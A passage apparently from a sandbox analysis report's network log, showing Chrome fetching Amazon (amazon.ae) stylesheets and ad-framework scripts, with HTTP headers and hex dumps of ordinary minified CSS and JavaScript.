                                                                                                                                                                                                                                                                      Data Ascii: #666;width:auto!important;padding:0 9px 0 8px;margin-bottom:5px;display:inline-block;margin-right:-4px}.nav-tpl-itemListDeepBrowse .nav-subcat-section .nav-subcat-links .nav-first,.nav-tpl-itemListDeepBrowse .nav-subcat-section .nav-subcat-links .nav_line
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC16384INData Raw: 72 52 65 67 69 6f 6e 61 6c 50 72 65 66 65 72 65 6e 63 65 73 2d 66 6f 6f 74 65 72 2d 63 6f 70 79 72 69 67 68 74 4f 6e 6c 79 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 37 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 33 70 78 7d 23 6e 61 76 46 6f 6f 74 65 72 20 2e 6e 61 76 46 6f 6f 74 65 72 4c 6f 67 6f 4c 69 6e 65 4c 69 6e 6b 73 57 69 74 68 48 6f 72 69 7a 6f 6e 74 61 6c 41 6c 69 67 6e 6d 65 6e 74 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 6d 61 72 67 69 6e 3a 31 38 70 78 20 61 75 74 6f 20 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 23 6e 61 76 46 6f 6f 74 65 72 20 2e 6e 61 76 46 6f 6f 74 65 72 4c 6f 67 6f 4c 69 6e 65 4c 69 6e 6b 73 57 69 74 68 56 65 72 74 69 63 61 6c 41 6c 69 67 6e 6d 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a
                                                                                                                                                                                                                                                                      Data Ascii: rRegionalPreferences-footer-copyrightOnly{margin-left:17px;margin-right:13px}#navFooter .navFooterLogoLineLinksWithHorizontalAlignment{vertical-align:top;margin:18px auto 0;padding-left:0}#navFooter .navFooterLogoLineLinksWithVerticalAlignment{text-align:
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC16384INData Raw: 57 69 64 74 68 53 75 62 6e 61 76 46 6c 79 6f 75 74 20 2e 6e 61 76 2d 66 6c 79 6f 75 74 2d 63 6f 6e 74 65 6e 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 37 70 78 7d 2e 6e 61 76 2d 63 61 74 46 6c 79 6f 75 74 7b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 20 33 70 78 20 33 70 78 20 33 70 78 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 20 33 70 78 20 33 70 78 20 33 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 20 33 70 78 20 33 70 78 20 33 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 5c 39 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 62 62 7d 2e 6e 61 76 2d 63 61 74 46
                                                                                                                                                                                                                                                                      Data Ascii: WidthSubnavFlyout .nav-flyout-content{padding-left:17px}.nav-catFlyout{margin:0;border-top:0;padding:0;-webkit-border-radius:3px 3px 3px 3px;-moz-border-radius:3px 3px 3px 3px;border-radius:3px 3px 3px 3px;border-radius:0\9;border:1px solid #bbb}.nav-catF
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC16384INData Raw: 61 76 2d 63 61 72 74 2d 69 74 65 6d 73 20 2e 6e 61 76 2d 63 61 72 74 2d 69 74 65 6d 20 2e 6e 61 76 2d 63 61 72 74 2d 73 63 61 72 63 69 74 79 7b 63 6f 6c 6f 72 3a 23 30 39 30 7d 23 6e 61 76 2d 63 61 72 74 2d 66 6c 79 6f 75 74 20 2e 6e 61 76 2d 63 61 72 74 2d 69 74 65 6d 73 20 2e 6e 61 76 2d 63 61 72 74 2d 69 74 65 6d 20 2e 6e 61 76 2d 63 61 72 74 2d 73 63 61 72 63 69 74 79 2d 6e 6f 73 74 6f 63 6b 7b 63 6f 6c 6f 72 3a 23 62 31 32 37 30 34 7d 23 6e 61 76 2d 63 61 72 74 2d 66 6c 79 6f 75 74 20 2e 6e 61 76 2d 63 61 72 74 2d 69 74 65 6d 73 20 2e 6e 61 76 2d 63 61 72 74 2d 69 74 65 6d 2d 62 72 65 61 6b 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 68 65 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 63 6c 65 61 72
                                                                                                                                                                                                                                                                      Data Ascii: av-cart-items .nav-cart-item .nav-cart-scarcity{color:#090}#nav-cart-flyout .nav-cart-items .nav-cart-item .nav-cart-scarcity-nostock{color:#b12704}#nav-cart-flyout .nav-cart-items .nav-cart-item-break{display:block;line-height:0;height:0;width:100%;clear
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC16384INData Raw: 20 23 6e 61 76 2d 75 70 6e 61 76 2d 61 69 72 79 7b 6d 61 72 67 69 6e 3a 30 7d 23 6e 61 76 2d 75 70 6e 61 76 2d 61 69 72 79 20 2e 6e 61 76 2d 61 69 72 79 2d 77 69 64 67 65 74 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 7d 23 6e 61 76 2d 75 70 6e 61 76 2d 61 69 72 79 20 23 6e 61 76 2d 61 69 72 79 2d 63 6c 69 63 6b 2d 74 68 72 6f 75 67 68 2d 73 74 61 67 65 7b 7a 2d 69 6e 64 65 78 3a 31 30 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 7d 23 6e 61 76 2d 75 70 6e 61 76 2d 61 69 72 79 20
                                                                                                                                                                                                                                                                      Data Ascii: #nav-upnav-airy{margin:0}#nav-upnav-airy .nav-airy-widget-wrapper{margin-bottom:0;width:100%;overflow-x:hidden}#nav-upnav-airy #nav-airy-click-through-stage{z-index:100;cursor:pointer;position:absolute;width:100%;height:100%;top:0;left:0}#nav-upnav-airy


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      19192.168.2.54974018.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC609OUTGET /images/I/41945FR1dZL.css?AUIClients/AmazonGatewayAuiAssets&IaVMOKWd HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC839INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                                                                      Content-Length: 18121
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: d0dd6dd3-21c3-4d79-acda-f2615a29a313
                                                                                                                                                                                                                                                                      Date: Tue, 23 Jul 2024 16:52:23 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Jul 2024 22:29:19 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-786,/images/I/41945FR1dZL
                                                                                                                                                                                                                                                                      Expires: Mon, 18 Jul 2044 16:52:23 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-786 /images/I/41945FR1dZL
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Via: 1.1 c870b446425c4f7268b92b3b09abcba8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 1994729
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: DvYVakYRJ6AoC1njYuDJH-46AH3cE231TYPMGGcnB7p2IlAvXIUgAg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 67 77 2d 73 70 69 6e 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 6d 2e 6d 65 64 69 61 2d 61 6d 61 7a 6f 6e 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 53 2f 73 61 73 68 2f 5a 55 72 57 70 30 70 66 34 32 76 63 61 65 6f 2e 67 69 66 29 20 35 30 25 20 35 30 25 20 6e 6f 2d 72 65 70 65 61 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 77 69 64 74 68 3a 37 30 70 78 3b 68 65 69 67 68 74 3a 37 30 70 78 7d 2e 67 77 2d 6c 6f 61 64 69 6e 67 2d 73 74 72 69 70 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 6d 2e 6d 65 64 69 61 2d 61 6d 61 7a 6f 6e 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f
                                                                                                                                                                                                                                                                      Data Ascii: @charset "UTF-8";.gw-spinner{background:url(https://m.media-amazon.com/images/S/sash/ZUrWp0pf42vcaeo.gif) 50% 50% no-repeat;display:inline-block;vertical-align:top;width:70px;height:70px}.gw-loading-stripe{background:url(https://m.media-amazon.com/images/
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1737INData Raw: 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 64 65 61 6c 73 2d 73 68 6f 76 65 6c 65 72 20 2e 64 65 61 6c 73 2d 73 68 6f 76 65 6c 65 72 2d 63 61 72 64 2d 69 6d 61 67 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 64 65 61 6c 73 2d 73 68 6f 76 65 6c 65 72 20 2e 64 65 61 6c 50 72 69 63 65 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 64 65 61 6c 73 2d 73 68 6f 76 65 6c 65 72 20 2e 64 65 61 6c 50 72 69 63 65 20 2e 64 65 61 6c 50 50 55 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 70 78 7d 2e 64 65 61 6c 73 2d 73 68 6f 76 65 6c 65
                                                                                                                                                                                                                                                                      Data Ascii: -block;height:100%;vertical-align:middle;min-height:inherit}.deals-shoveler .deals-shoveler-card-image{display:inline-block}.deals-shoveler .dealPrice{font-weight:400;color:#000}.deals-shoveler .dealPrice .dealPPU{color:#000;margin-left:5px}.deals-shovele


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      20192.168.2.54974418.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC618OUTGET /images/S/apesafeframe/ape/la/desktop/ApeDLA-1.50.30136ee2.js?csm_attribution=APE-SafeFrame HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1683INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: text/javascript
                                                                                                                                                                                                                                                                      Content-Length: 42614
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 2a524287-55bd-4138-93c2-ca41d7d24eaf
                                                                                                                                                                                                                                                                      Date: Thu, 08 Aug 2024 18:30:43 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 08 Aug 2024 18:29:52 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-345,/images/S/apesafeframe/ape/la/desktop/ApeDLA-1.50.30136ee2
                                                                                                                                                                                                                                                                      Expires: Tue, 04 Feb 2025 18:30:43 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-345 /images/S/apesafeframe/ape/la/desktop/ApeDLA-1.50.30136ee2
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Via: 1.1 03335b4388aac682bcebdd7893781376.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 1121576
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: hbIgvRLyJaVRz0LGHYQaWZC_b8s1GYHWBCcTwBhzw_J98o8Fb_nixw==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC16384INData Raw: 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 65 3d 3e 65 2b 22 5f 46 65 65 64 62 61 63 6b 22 3b 63 6c 61 73 73 20 74 7b 61 73 79 6e 63 20 61 64 64 53 70 6f 6e 73 6f 72 65 64 4c 61 62 65 6c 57 69 74 68 46 65 65 64 62 61 63 6b 4c 69 6e 6b 28 65 2c 74 29 7b 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 54 6f 28 74 68 69 73 2e 70 61 72 65 6e 74 48 74 6d 6c 49 64 2c 74 68 69 73 29 3b 63 6f 6e 73 74 20 61 3d 61 77 61 69 74 20 74 2e 67 65 74 53 70 6f 6e 73 6f 72 65 64 4c 61 62 65 6c 41 6e 64 46 65 65 64 62 61 63 6b 4c 69 6e 6b 28 74 68 69 73 2e 75 72 6c 50 61 74 68 41 6e 64 50 61 72 61 6d 65 74 65 72 29 3b 69 66 28 21 28 6e 75 6c 6c 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 69 73 4f 6b 28 29 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 60 52 65 73 75 6c 74 20 66 72
                                                                                                                                                                                                                                                                      Data Ascii: (()=>{const e=e=>e+"_Feedback";class t{async addSponsoredLabelWithFeedbackLink(e,t){e.appendChildTo(this.parentHtmlId,this);const a=await t.getSponsoredLabelAndFeedbackLink(this.urlPathAndParameter);if(!(null==a?void 0:a.isOk()))throw new Error(`Result fr
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC16384INData Raw: 6e 22 2c 4b 65 3d 22 4c 69 67 68 74 41 64 49 6d 70 72 65 73 73 69 6f 6e 22 2c 58 65 3d 22 76 69 65 77 61 62 6c 65 6c 61 74 65 6e 63 79 22 2c 5a 65 3d 28 65 2c 74 2c 61 29 3d 3e 28 7b 63 73 61 4b 65 79 3a 65 2c 63 73 6d 4b 65 79 3a 74 2c 63 73 6d 4d 65 73 73 61 67 65 3a 61 7d 29 2c 65 74 3d 28 5a 65 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 51 65 29 2c 5a 65 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 4b 65 29 29 2c 74 74 3d 28 5a 65 28 22 62 6f 64 79 45 6e 64 22 2c 22 62 65 22 29 2c 5a 65 28 22 63 6c 69 63 6b 54 6f 41 54 46 22 2c 22 61 66 22 29 2c 5a 65 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65 22 2c 22 63 66 22 29 2c 5a 65 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65 22 2c 22 63 66 22 2c 51 65 29 2c 5a 65 28 22 63 72
                                                                                                                                                                                                                                                                      Data Ascii: n",Ke="LightAdImpression",Xe="viewablelatency",Ze=(e,t,a)=>({csaKey:e,csmKey:t,csmMessage:a}),et=(Ze("bodyBegin","bb",Qe),Ze("bodyBegin","bb",Ke)),tt=(Ze("bodyEnd","be"),Ze("clickToATF","af"),Ze("criticalFeature","cf"),Ze("criticalFeature","cf",Qe),Ze("cr
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC9846INData Raw: 6f 6e 73 74 20 61 3d 6e 75 6c 6c 21 3d 3d 28 74 3d 65 2e 63 72 65 61 74 69 76 65 2e 61 64 45 6c 65 6d 65 6e 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 65 2e 64 69 76 3b 6e 65 77 20 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 28 28 74 2c 6e 29 3d 3e 7b 63 6f 6e 73 74 20 69 3d 28 29 3d 3e 7b 74 68 69 73 2e 66 69 72 65 28 65 29 2c 6e 2e 75 6e 6f 62 73 65 72 76 65 28 61 29 7d 3b 74 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65 2e 69 73 49 6e 74 65 72 73 65 63 74 69 6e 67 3f 74 68 69 73 2e 74 68 72 65 73 68 6f 6c 64 54 69 6d 65 56 69 73 69 62 6c 65 4d 73 3e 30 3f 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 49 64 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 28 29 3d 3e 69 28 29 29 2c 74 68 69 73 2e 74 68 72 65 73 68 6f 6c 64 54 69 6d 65 56 69 73
                                                                                                                                                                                                                                                                      Data Ascii: onst a=null!==(t=e.creative.adElement)&&void 0!==t?t:e.div;new IntersectionObserver(((t,n)=>{const i=()=>{this.fire(e),n.unobserve(a)};t.forEach((e=>{e.isIntersecting?this.thresholdTimeVisibleMs>0?this.intervalId=setTimeout((()=>i()),this.thresholdTimeVis


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      21192.168.2.54974618.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC616OUTGET /images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6.js?csm_attribution=APE-SafeFrame HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1679INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: text/javascript
                                                                                                                                                                                                                                                                      Content-Length: 48888
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 46daee71-1e80-4bd2-8a0a-6255bc1c8421
                                                                                                                                                                                                                                                                      Date: Thu, 08 Aug 2024 13:23:38 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 08 Aug 2024 13:22:39 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-088,/images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6
                                                                                                                                                                                                                                                                      Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-088 /images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Via: 1.1 ed52b6cbe30df623c9ae923641ddf518.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 1141452
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: znvVCQZG3Fm2VXaKdES3hlz7iwDi7oZ__ojX6HLV_AyZcuSLU-QYwg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC14705INData Raw: 28 28 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 2e 64 65 66 61 75 6c 74 3a 65 7d 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 3a 22 29 7d 2c 69 3d 2f 28 5c 2f 62 7c 5c 2f 73 7c 5c 2f 6c 29 2e 2a 28 6e 6f 64 65 3d 29 28 5c 64 7b 31 2c 31 32 7d 29 2f 2c 6e 3d 6e 65 77 20 4d 61 70 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 6e 2e 68 61 73 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 29 7b 76 61 72 20 65 3d 69 2e 65 78 65 63 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 74 3d 65 26 26 65 5b 33 5d 3f 65 5b 33 5d 3a 6e 75 6c 6c 3b 6e 2e 73 65 74 28
                                                                                                                                                                                                                                                                      Data Ascii: (()=>{function e(e){return e&&e.__esModule?e.default:e}var t=function(e){return e.replace(/_/g,":")},i=/(\/b|\/s|\/l).*(node=)(\d{1,12})/,n=new Map,a=function(){if(!n.has(window.location.href)){var e=i.exec(window.location.href),t=e&&e[3]?e[3]:null;n.set(
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC16384INData Raw: 65 5d 2e 73 6c 6f 74 49 64 26 26 28 46 28 22 4f 66 66 73 65 74 4c 65 66 74 22 2c 7b 69 64 3a 61 2e 61 64 4d 61 70 5b 65 5d 2e 6f 70 74 69 6f 6e 73 2e 70 6c 61 63 65 6d 65 6e 74 49 64 2c 6e 61 6d 65 3a 6f 5b 65 5d 2e 73 6c 6f 74 49 64 7d 2c 6c 2e 6f 66 66 73 65 74 4c 65 66 74 29 2c 46 28 22 4f 66 66 73 65 74 54 6f 70 22 2c 7b 69 64 3a 61 2e 61 64 4d 61 70 5b 65 5d 2e 6f 70 74 69 6f 6e 73 2e 70 6c 61 63 65 6d 65 6e 74 49 64 2c 6e 61 6d 65 3a 6f 5b 65 5d 2e 73 6c 6f 74 49 64 7d 2c 6c 2e 6f 66 66 73 65 74 54 6f 70 29 2c 46 28 22 4f 66 66 73 65 74 57 69 64 74 68 22 2c 7b 69 64 3a 61 2e 61 64 4d 61 70 5b 65 5d 2e 6f 70 74 69 6f 6e 73 2e 70 6c 61 63 65 6d 65 6e 74 49 64 2c 6e 61 6d 65 3a 6f 5b 65 5d 2e 73 6c 6f 74 49 64 7d 2c 6c 2e 6f 66 66 73 65 74 57 69 64 74
